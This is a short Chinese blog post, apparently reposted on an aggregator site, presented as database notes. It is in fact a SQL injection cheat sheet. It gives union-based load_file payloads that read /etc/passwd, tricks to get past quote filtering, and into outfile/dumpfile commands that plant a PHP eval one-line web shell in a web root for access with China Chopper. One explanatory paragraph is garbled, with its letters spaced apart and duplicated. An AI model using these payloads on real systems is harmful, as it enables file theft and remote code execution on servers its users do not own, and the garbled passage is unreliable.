数据库笔记2

本文主要是介绍数据库笔记2，对大家解决编程问题具有一定的参考价值，需要的程序猿们随着小编来一起学习吧！

load_file()函数 读文件操作
前提：
知道文件绝对路径
能够使用union查询
对web目录有写权限
union select 1,load_file(’/etc/passwd’),3,4,5,6#
union select 1,load_file(如果引号被过滤可以用16进制),3,4,5,6#

into outfile()写文件操作
前提:
文件名必须全路径(绝对路径)
用户必须有写文件的权限
没有对’引号过滤
select ‘<?php phpinfo?>’ into outfile ‘绝对路径’
select ‘12345’ into outfile ‘d:/2.txt’

into dumpfile()写文件操作 支持二进制读写
select ‘12345’ into dumpfile ‘d:/3.txt’

select ‘<?php eval($_POST[1]);?>’ into outfile ‘d:/phpstudy/www/1.php’
在目录d:/phpstudy/www/下新建一个1.php文件内容是<?php eval($_POST[1]);?>

写入一句话木马
P O S T [ 1 ] 接 收 p o s t 传 来 的 1 的 参 数 e v a l ( ) 函 数 把 当 前 字 符 串 内 容 当 成 p h p 代 码 来 执 行 通 过 P O S T 方 式 在 网 页 中 把 自 己 写 的 代 码 赋 值 给 1 ， 然 后 _POST[1] 接收post传来的1的参数 eval()函数 把当前字符串内容当成php代码来执行 通过POST方式在网页中把自己写的代码赋值给1，然后 P​OST[1]接收post传来的1的参数eval()函数把当前字符串内容当成php代码来执行通过POST方式在网页中把自己写的代码赋值给1，然后_POST函数接收1的值，再通过eval函数就执行自己传送的代码了

通过中国菜刀连接

这篇关于数据库笔记2的文章就介绍到这儿，希望我们推荐的文章对大家有所帮助，也希望大家多多支持为之网！